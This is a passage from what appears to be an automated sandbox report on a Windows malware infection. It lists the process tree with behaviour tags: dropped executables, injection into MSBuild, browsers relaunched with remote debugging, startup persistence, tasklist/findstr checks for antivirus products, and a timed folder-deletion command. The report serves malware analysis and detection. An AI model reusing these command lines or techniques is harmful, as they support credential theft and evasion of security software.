                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2460,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:8
                                          9⤵
                                            PID:2904
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3472,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:4000
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:5548
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4168,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:1148
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4180,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:2
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:5404
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5068,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=5056 /prefetch:8
                                            9⤵
                                              PID:412
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:8
                                              9⤵
                                                PID:6184
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5196,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8
                                                9⤵
                                                  PID:7104
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5084,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:8
                                                  9⤵
                                                    PID:6968
                                                • C:\ProgramData\0r1vaa1no8.exe
                                                  "C:\ProgramData\0r1vaa1no8.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4776
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    9⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4852
                                                • C:\ProgramData\89r1ngvkng.exe
                                                  "C:\ProgramData\89r1ngvkng.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:7068
                                                  • C:\ProgramData\89r1ngvkng.exe
                                                    "C:\ProgramData\89r1ngvkng.exe"
                                                    9⤵
                                                    • Downloads MZ/PE file
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Checks processor information in registry
                                                    PID:5816
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                      10⤵
                                                        PID:7164
                                                      • C:\Users\Admin\AppData\Local\FkScDGW3CqUh.exe
                                                        "C:\Users\Admin\AppData\Local\FkScDGW3CqUh.exe"
                                                        10⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:22296
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          11⤵
                                                            PID:22316
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            11⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:22332
                                                        • C:\Users\Admin\AppData\Local\799zieDGb1Fh.exe
                                                          "C:\Users\Admin\AppData\Local\799zieDGb1Fh.exe"
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:22396
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            11⤵
                                                              PID:22412
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              11⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Checks processor information in registry
                                                              PID:22428
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                12⤵
                                                                • Uses browser remote debugging
                                                                • Checks processor information in registry
                                                                • Enumerates system info in registry
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:20580
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffed039dcf8,0x7ffed039dd04,0x7ffed039dd10
                                                                  13⤵
                                                                    PID:20604
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1584,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:3
                                                                    13⤵
                                                                      PID:20804
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
                                                                      13⤵
                                                                        PID:20816
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2316,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2480 /prefetch:8
                                                                        13⤵
                                                                          PID:20876
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3088 /prefetch:1
                                                                          13⤵
                                                                          • Uses browser remote debugging
                                                                          PID:20916
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3252 /prefetch:1
                                                                          13⤵
                                                                          • Uses browser remote debugging
                                                                          PID:20924
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4260 /prefetch:2
                                                                          13⤵
                                                                          • Uses browser remote debugging
                                                                          PID:21148
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4452,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4604 /prefetch:1
                                                                          13⤵
                                                                          • Uses browser remote debugging
                                                                          PID:21240
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4796,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4872 /prefetch:8
                                                                          13⤵
                                                                            PID:21640
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,6050805751206874591,7367673886134574444,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5392 /prefetch:8
                                                                            13⤵
                                                                              PID:21684
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                            12⤵
                                                                            • Uses browser remote debugging
                                                                            PID:9584
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                                                              13⤵
                                                                              • Uses browser remote debugging
                                                                              • Checks processor information in registry
                                                                              • Enumerates system info in registry
                                                                              • Modifies data under HKEY_USERS
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:9596
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2ac,0x7ffeb58ef208,0x7ffeb58ef214,0x7ffeb58ef220
                                                                                14⤵
                                                                                  PID:9628
                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                    C:\Windows\system32\WerFault.exe -u -p 9628 -s 560
                                                                                    15⤵
                                                                                      PID:10500
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1956,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
                                                                                    14⤵
                                                                                      PID:9888
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2044,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=2036 /prefetch:2
                                                                                      14⤵
                                                                                        PID:9896
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
                                                                                        14⤵
                                                                                          PID:9908
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
                                                                                          14⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:10156
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3520,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
                                                                                          14⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:10168
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=2680,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
                                                                                          14⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:10244
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4316,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:2
                                                                                          14⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:10252
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3692,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:2
                                                                                          14⤵
                                                                                            PID:17324
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3880 /prefetch:8
                                                                                            14⤵
                                                                                              PID:17404
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3712,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:8
                                                                                              14⤵
                                                                                                PID:11136
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4956,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5364 /prefetch:8
                                                                                                14⤵
                                                                                                  PID:11172
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:8
                                                                                                  14⤵
                                                                                                    PID:11204
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:8
                                                                                                    14⤵
                                                                                                      PID:11224
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5586902361003981378,14493543869549792723,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:8
                                                                                                      14⤵
                                                                                                        PID:11240
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                    12⤵
                                                                                                    • Uses browser remote debugging
                                                                                                    PID:11644
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                                                                                      13⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:11684
                                                                                              • C:\Users\Admin\AppData\Local\brcUJVpwDfcW.exe
                                                                                                "C:\Users\Admin\AppData\Local\brcUJVpwDfcW.exe"
                                                                                                10⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:22196
                                                                                                • C:\Users\Admin\AppData\Local\Temp\92jyOLWg\5KIImHRzgS0Hh1mH.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\92jyOLWg\5KIImHRzgS0Hh1mH.exe 0
                                                                                                  11⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:22140
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\92jyOLWg\YqBVrdm8vWYfrU4x.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\92jyOLWg\YqBVrdm8vWYfrU4x.exe 22140
                                                                                                    12⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:22080
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 22080 -s 616
                                                                                                      13⤵
                                                                                                      • Program crash
                                                                                                      PID:18248
                                                                                          • C:\ProgramData\asr1dbsjmy.exe
                                                                                            "C:\ProgramData\asr1dbsjmy.exe"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4960
                                                                                            • C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe 0
                                                                                              9⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:6360
                                                                                              • C:\Users\Admin\AppData\Local\Temp\y1ETaysj\clLzVtQpT2xPX0V0.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\y1ETaysj\clLzVtQpT2xPX0V0.exe 6360
                                                                                                10⤵
                                                                                                • Drops startup file
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5392
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 932
                                                                                                10⤵
                                                                                                • Program crash
                                                                                                PID:16628
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\7q9hd" & exit
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:16744
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 11
                                                                                              9⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:22220
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:1552
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:3940
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5296
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4332
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10046340101\9625e70c4a.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10046340101\9625e70c4a.exe"
                                                                                        6⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Windows directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2660
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3108
                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                            tasklist
                                                                                            8⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:6196
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr /I "opssvc wrsa"
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6204
                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                            tasklist
                                                                                            8⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1632
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5832
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c md 674187
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6956
                                                                                          • C:\Windows\SysWOW64\extrac32.exe
                                                                                            extrac32 /Y /E Funky.wbk
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5336
                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                            findstr /V "Und" Tournament
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:7052
                                                                                          • C:\Windows\SysWOW64\cmd.exe
